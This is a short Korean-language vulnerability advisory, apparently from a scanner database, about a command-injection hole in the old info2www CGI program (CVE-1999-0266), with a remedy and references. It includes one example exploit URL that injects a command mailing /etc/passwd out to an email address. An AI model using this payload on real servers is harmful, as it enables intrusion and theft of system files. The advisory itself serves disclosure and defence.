English

◀◁ 뒤로 취약점ID 21055 위험도 40 포트 80, ... 프로토콜 TCP 분류 CGI 상세설명 해당 웹서버에 "info2www" CGI 프로그램이 설치되어 있다. 이 CGI 스크립트는 GNU Info Node들을 웹을 통하여 볼 수 있도록 HTML로 변환하기 위해 사용되는 프로그램이다. 그러나, 이 CGI는 외부에서 http 데몬의 권한으로 임의의 명령을 수행할 수 있는 잘 알려져 있는 Hole을 가지고 있다. 예를들어, 다음과 같은 URL을 요구하게 되면 http://target/cgi-bin/info2www?"(../../../bin/mail your@email < /etc/passwd|)" 패스워드 파일을 가지고 올 수도 있다. * 영향을 받는 플랫폼: Web Server 해결책 Paranoid site들의 모든 CGI 스크립트들은 보안 취약점들에 대한 철저하게 검증될 때까지 disable되어야 한다. info2www의 1.2 이전 버전들은 모두 취약하며 info2html, infogate들도 마찬가지 취약점을 가지고 있다. 관련 URL CVE-1999-0266 (CVE) 관련 URL 1995 (SecurityFocus) 관련 URL 1732 (ISS)